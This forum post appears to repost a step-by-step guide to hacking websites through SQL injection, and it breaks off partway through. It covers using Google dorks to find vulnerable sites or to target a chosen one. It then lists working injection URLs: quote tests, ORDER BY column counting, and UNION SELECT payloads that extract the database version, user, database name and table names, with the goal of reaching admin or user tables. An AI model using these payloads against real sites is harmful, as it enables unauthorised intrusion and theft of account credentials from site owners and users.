ဒါကိုအရင္ဖတ္ေပးပါ

[Delete]

အသင္း၀င္မ်ားအေနျဖင့္ပို႔(စ္)တစ္ခုကိုတင္မည္ဆိုပါကေခါင္းစဥ္ႏွင့္သက္ဆိုင္ေသာအေၾကာင္းကိုရွင္းလင္းစြာတင္ေပးပါရန္

[Delete]

CREDIT BY MMSO.ORG
aလ့လာခ်င္သူေတြအတြက္တင္ေပးျခင္းသာျဖစ္ပါတယ္။

[url=http://www.mmso.org/home/showthread.php/6398-Hacking-website-using-SQL-Injection-step-by-step-guide]Hacking website using SQL
Injection -step by step guide[/url]

Before we see what SQL
Injection is. We should know what SQL and Database are.

[b]Database:[/b]
Database
is collection of data. In website point of view, database is used
for storing user ids,passwords,web page details and more.



[b]Some
List of Database are:[/b]

* DB servers,
* MySQL(Open
source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre
SQL(open source),
* SQLite,



[b]SQL:[/b]
Structured
Query Language is Known as SQL. In order to communicate with the
Database ,we are using SQL query. We are querying the database so it is
called as Query language.
Some Examples:

Code: [url=http://mmict.co.cc/javascript:void(0);][Select][/url]
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
Code: [url=http://mmict.co.cc/javascript:void(0);][Select][/url]
http://www.ziddu.com/download/13161874/A...t.zip.html


[b]How to use?[/b]

copy one of the above command and paste in the google search engine
box.

Hit enter.

You can get list of web sites.

We have to visit the websites one by one for checking the
vulnerability.

So Start from the first website.

[img]http://1.bp.blogspot.com/_Bgs5mP8GXd8/TRnE45Qv1KI/AAAAAAAAACU/7jkUFr61Owo/s500/Sql+Injection+1+copy.jpg[/img]



Note:if you like to hack particular website,then try this:

site:[url=http://www.victimsite.com/]www.victimsite.com[/url]
dork_list_commands

for eg:

site:[url=http://www.victimsite.com/]www.victimsite.com[/url] inurl:index.php?id=

[b]Step 2: Checking the Vulnerability:[/b]

Now we should check the vulnerability of websites. In order to check
the vulnerability ,add the single quotes(') at the end of the url and
hit enter. (No space between the number and single quotes)



For eg:
Code:

[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url]'

If the page remains in same page or showing that page not found or
showing some other webpages. Then it is not vulnerable.

If
it showing any errors which is related to sql query,then it is
vulnerable. Cheers..!!
For eg:

You have an error in
your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near ''' at line 1

[b]Step
3: Finding Number of columns:[/b]
Now we have found the
website is vulnerable. Next step is to find the number of columns in
the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and
order by n statement)

Change the n
from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column
".

For eg: Code:

[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 1
[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 2
[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 3
[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 4

change the number until you get the error as "unknown column"

if
you get the error while trying the "x"th number,then no of column is
"x-1".

I mean:

Code:

[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 1(noerror)
[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 2(noerror)
[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 3(noerror)
[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 4(noerror)
[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 5(noerror)
[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 6(noerror)
[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by
[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 8(error)
so now x=8 , The number of column is x-1 i.e, 7.

Sometime
the above may not work. At the time add the "--" at the end of the
statement.
For eg:
Code:

[url=http://www.victimsite.com/index.php?id=2]http://www.victimsite.com/index.php?id=2[/url] order by 1--

[b]Step 4: Displaying the Vulnerable columns:[/b]
Using
"union select columns_sequence" we can
find the vulnerable part of the table. Replace the "order by n" with
this statement. And change the id value to negative(i mean
id=-2,must change,but in some website may work without changing).

Replace
the columns_sequence with the no from 1 to x-1(number of columns)
separated with commas(,).

For eg:
if the number of columns
is 7 ,then the query is as follow:
Code:

[url=http://www.victimsite.com/index.php?id=-2]http://www.victimsite.com/index.php?id=-2[/url] union select 1,2,3,4,5,6,7--

If the above method is not working then try this:
Code:

[url=http://www.victimsite.com/index.php?id=-2]http://www.victimsite.com/index.php?id=-2[/url] and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than 'x' value,
i mean less than or equl to number of columns).

Like this:


[img]http://3.bp.blogspot.com/_Bgs5mP8GXd8/TRnSNLFkz-I/AAAAAAAAACg/gxcL4v9j-Aw/s1600/Sql+Injection+2.JPG[/img]
Now select 1 number.
It showing 3,7.
Let's take the Number 3.

Step 5: Finding version,database,user
Now
replace the 3 from the query with "version()"

For eg:

Code:

[url=http://www.victimsite.com/index.php?id=-2]http://www.victimsite.com/index.php?id=-2[/url] and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace
the version() with database() and user() for finding the database,user
respectively.

For eg:

h Code:

ttp://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

[url=http://www.victimsite.com/index.php?id=-2]http://www.victimsite.com/index.php?id=-2[/url] and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

Code:

[url=http://www.victimsite.com/index.php?id=-2]http://www.victimsite.com/index.php?id=-2[/url] and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

[b]Step 6: Finding the Table Name[/b]
Now we have to
find the table name of the database. Replace the 3 with
"group_concat(table_name) and add the "from information_schema.tables
where table_schema=database()"

For eg:

Code:

[url=http://www.victimsite.com/index.php?id=-2]http://www.victimsite.com/index.php?id=-2[/url] and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will show the list of table names. Find the table name which
is related with the admin or user.


[img]http://2.bp.blogspot.com/_Bgs5mP8GXd8/TRnVpPHS26I/AAAAAAAAACk/IhsV7_icXr0/s1600/Sql+Injection+3.JPG[/img]

Now select the "admin " table.


[b]Step
7: Finding the Column Name[/b]

Now replace the
"group_concat(table_name) with the "group_concat(column_name)"

Replace
the "from information_schema.tables where table_schema=database()--"
with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now
listen carefully ,we have to find convert the table name to MySql
CHAR() string and replace mysqlchar with that .

Find
MysqlChar() for Tablename:
First of all install the HackBar addon:

Code: [url=https://addons.mozilla.org/en-US/firefox/addon/3899/]https://addons.mozilla.org/en-US/firefox/addon/3899/[/url] [img]https://2img.net/u/1813/30/78/37/smiles/161578.gif[/img] [img]https://2img.net/u/1813/30/78/37/smiles/962543.gif[/img]